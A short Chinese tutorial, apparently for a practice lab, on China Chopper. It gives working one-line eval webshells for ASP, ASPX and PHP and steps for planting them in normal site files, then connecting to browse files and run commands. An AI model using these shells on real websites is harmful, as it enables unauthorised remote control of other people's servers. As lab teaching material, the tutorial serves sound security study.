實驗吧有個試驗環境:http://www.shiyanbar.com/experiment-course/experiment-course/vid/1812
菜刀的主要功能是用來連接一句話木馬的,asp,aspx,php的一句話菜刀都可以連明知是這幾種一句話的語句不一樣
asp的一句話是:
<%eval request ("pass")%>
aspx的一句話是:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句話是:
<?php @eval($_POST['pass']);?>
這幾個一句話的密碼都是pass,也就是雙引號或者單引號包含着的這部分,例如把asp的一句話密碼改成drvfan,那么改完之后就是這樣的:
<%eval request("drvfan")%>
其他同理。
要想連一句話,你首先得把這個一句話插入到一個正常的網站文件中,asp的一句話插入到asp文件里,aspx的一句話插入到aspx文件里,php同理。
當然,你也可以把一句話單獨寫在一個文件里,比如你新建了一個asp文件,這個asp文件的全部內容就只有一個一句話,也是可以的。
插入了一句話木馬,下面就是連接了。
在菜刀主界面,右擊,選擇“添加”,
在“地址”這里填上你插入一句話的文件的地址,后邊的那個小框填的是你的一句話的密碼,其他的不用填,
填完之后單擊“添加”,就可以了。
添加完畢后,你的這個一句話的shell會顯示到主界面里,右擊它,選擇“文件管理”,就可以看到網站上的文件了
在菜刀里還有一個功能,是“虛擬終端”,也是在右鍵菜單里的,這個相當於webshell中的執行DOS命令的功能
如果你的shell有權執行DOS命令,那么直接輸入命令回車就可以看到結果了。
下面有一篇類似的文章《中國菜刀與一句話木馬》,
文章地址:http://blog.csdn.net/hitwangpeng/article/details/47021573